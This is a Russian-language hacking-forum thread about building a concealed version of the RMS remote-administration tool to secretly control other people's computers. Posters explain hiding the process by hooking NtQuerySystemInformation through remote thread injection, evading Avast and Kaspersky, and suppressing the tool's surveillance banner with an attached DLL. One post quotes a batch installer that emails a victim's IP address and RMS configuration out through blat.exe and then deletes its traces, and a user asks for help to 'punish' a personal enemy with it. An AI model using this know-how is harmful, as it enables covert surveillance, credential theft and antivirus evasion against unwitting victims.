Скрытый RMS [удаленное администрирование]

Тема в разделе "Самое важное", создана пользователем sawyer1992, 25 фев 2011.

1. art22
    art22 Новичок
    Симпатии:
    3
    Mr.Burns,
    есть прога под названием HideToolz он скрывает процесс одним лишь нажатием, нельзя создать отдельный exe файл с определенными параметрами чтобы скрывал этот процесс, я думаю тот кто разберается в программирование закритыми глазами это сделает)

28 дек 2012
  2. Mr.Burns
    Mr.Burns местная мразь Продвинутый
    Симпатии:
    62
    даже кто не разбирается, знает - NtQuerySystemInformation. ага.

а этот ваш HideToolz запускает драйвер (т.е. без админских прав ничего скрываться не будет), кроме того, на сколько я знаю - в x64 так просто перехватывать функи из дрова тоже не выйдет, ибо patchguard.

а вообще идея заключается в скрытии БЕЗ запуска левых бинарников.

28 дек 2012
  3. peskot
    peskot Новичок
    Симпатии:
    0
    дайте сылку, на первой страничке устарела.
    И у меня аваст палит инстал бат сразу! решили уже ету проблему?

28 дек 2012
  4. deity
    deity Новичок
    Симпатии:
    7
    ty

7 янв 2013
  5. katabr
    katabr Новичок
    Симпатии:
    0
    Всем привет, помогите за небольшое вознаграждение собрать новую сборку, а то со старой проблемы, собрал её по мануалу и работала раньше. Сейчас уже не актуальна, а мануала для версии 5.3 так и нет :(

9 янв 2013
  6. subor
    subor Новичок
    Симпатии:
    1

А особо ничего не изменилось. Если каждый раз требуется подробный мануал - то смысла использовать этот софт нет, так как периодически все-равно приходиться что-то подкручивать и требуются хотя-бы минимальные знания и понимание. Единственное что изменилось - не трогаем офф файлы, а используем волш****ю дллку. А в остальном то же самое - ставим хост, настраиваем у себя, ставим вьювер, конфигурим мси. Момент - в качестве дистриба хоста указываем подготовленный офф мси - то есть с вырезанным/вставленным нужным контентом. Далее полученный мси жмем 7зсфикс - тут это все есть.
    Если что не понял - звеняй, туториула писать не буду. Чем больше мануалов, да еще с видео - тем больше школьников и как следствие палева.
    Так что благодарим Скльпеля, Брунса и еже с ними, и следим за их достижениями :) А дальше сами...

10 янв 2013
  7. Pikachu43
    Pikachu43 Новичок
    Симпатии:
    0
    У меня не большая проблема на новых версиях появляется после открытия офф сайт)
    По этому я использую старый сервер 5.1 помойму)
    Так вот после перезагрузки у жертвы сервер продолжает висеть в процессах но но к нему не подключается пробовал на дедиках после перезагрузки висит но ноль реакции..

12 янв 2013
  8. sergey1237
    sergey1237 Новичок
    Симпатии:
    0
    прикольно что люди мыслят по разному:)...Я бы сделал: "процесс" котрый ожидает окно "стандартного диспетчера"
    а там или процесс "рмс"можно стопорнуть ,или деспетчер запретить ......и все на любом языке решается в 2-3 строки кода.
    цель должна оправдывать средства....:)Я свою сборку в процессах не прячу...так как пользую на друзьях и товарищах....:)

13 янв 2013
  9. Pikachu43
    Pikachu43 Новичок
    Симпатии:
    0
    Есть кряк что бы рмс не палился в процессах и тд только тоолько в одной скрытой папке) криптануть и всё его можно найти на хеппи.

13 янв 2013
  10. katabr
    katabr Новичок
    Симпатии:
    0
    subor,
    Спасибо, реально помогло :)

13 янв 2013
  11. Mr.Burns
    Симпатии:
    62
    стопорить и запрещать как-то не тру.
    попался код с opensc, там в цикле ожидается процесс таскманагера (можно и другие подобные софтины, принцип тот же) и при его старте создается удалённый поток, в котором собсно и перехватывается NtQuerySystemInformation. так же сразу после создания потока можно послать диспетчеру WM_TIMER, тогда список процессов обновится немедленно (особенно если у юзверя скорость обновления ниже нормального).

только из-под длл это всё не работает. только начал на васме во что-то вникать, как васм закрылся. :(

13 янв 2013
  12. vladmd
    vladmd Новичок
    Симпатии:
    0
    Сделал сборку по инструкции, все работало, конектился на ура!
    А потом ни с того ни с чего при запеске экзешника стал DreamWeawer запускать script.js и все! Все перестало работать! Кто может подсказать??? Пробовал на 3-х компах - одно и то же...(

14 янв 2013
  13. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Приветствую вас Хакеры!Хай Гитлер)) ругался с одним Васьком в нети.он решил меня наказать.и скинул мне ехе RMS!я распаковал ехе.бля а там)) мыло и пароль,Васи!корочи я его хакнул.да пошол он в жопу.мне понравился RMS!ещё больше.я стал любить Delphi!))теперь посути.ребята касперычь зверюга заколибал.палит валит всё. пачём зря.и сильно рычит на ехе! с install.bat удолил

start /wait %temp%\mpr.exe /export
    realip.exe > realip.txt
    ping -n 5 127.0.0.1 > nul
    blat.exe -install -server smtp.yandex.ru -port 25 -f ###LOGIN###@yandex.ru -u ###LOGIN### -pw ###PASSWORD###
    blat.exe -to ###LOGIN###@yandex.ru -subject "PERFECTLY! RMS Service (c) by Alex Hitch" -attachi "realip.txt" -body "Real Ip [pass]" -attach %temp%\*.mpf

attrib -s -h -r "%temp%/blat.dll"
    attrib -s -h -r "%temp%/blat.lib"
    attrib -s -h -r "%temp%/block_reader.sys"
    attrib -s -h -r "%temp%/HookLib.dll"
    attrib -s -h -r "%temp%/blat.exe"
    attrib -s -h -r "%temp%/mpr.exe"
    attrib -s -h -r "%temp%/realip.exe"
    attrib -s -h -r "%temp%/mpr.ini"

del /f /q %temp%\realip.txt
    del /f /q %temp%\ipconfig.txt
    del /f /q %temp%\*.mpf
    del /f /q %temp%\blat.dll
    del /f /q %temp%\blat.exe
    del /f /q %temp%\blat.lib
    del /f /q %temp%\block_reader.sys
    del /f /q %temp%\HookLib.dll
    del /f /q %temp%\mpr.ini
    del /f /q %temp%\mpr.exe
    del /f /q %temp%\realip.exe

attrib -s -h -r "%temp%\stop.js"
    attrib -s -h -r "%temp%\install.bat"

del /f /q "%temp%\stop.js"
    del /f /q "%temp%\install.bat

впринцепи они мне на х.. не нужы.у меня цель другая.НО один хер палево.
    скажите че ещё убрать.Каспер стал палить BAT файлы если там команда скрыть установку.и де Крах:)af: потерялся че делать бля::bu:

17 янв 2013
  14. 4ekkk
    4ekkk Новичок
    Симпатии:
    7
    Во первых нужно общаться без мата постараться и глядишь тебе ответят!!!

17 янв 2013
  15. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Старик ты только жить меня неучи!!!! лучше скажи по теме,че делать?

18 янв 2013
  16. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    Подскажите как работает dll. от "Mr.Burns" для скрытия баннера о видеонаблюдении и как его создать?

19 янв 2013
  17. Mr.Burns
    Симпатии:
    62
    как работает - сам ответил. скрывает баннер.
    закинуть длл в папку с рмс. всё. больше ничего делать не нужно.

19 янв 2013
  18. damirtm58n
    damirtm58n Новичок
    Симпатии:
    0
    А ссылку для скачивания на какой странице найти?

19 янв 2013
  19. Mr.Burns
    Симпатии:
    62
    за новыми версиями не слежу, но должно работать.

Вложения:

• msimg32.zip
      Размер файла:
      1,6 КБ
      Просмотров:
      330
    19 янв 2013
  20. Spaiss
    Spaiss Новичок
    Симпатии:
    0
    Ребят помагите! писал выше проблему.надо наказать одну сволочь( а унего Каспер мне всю мазу портит!:diablo:

20 янв 2013
Загрузка...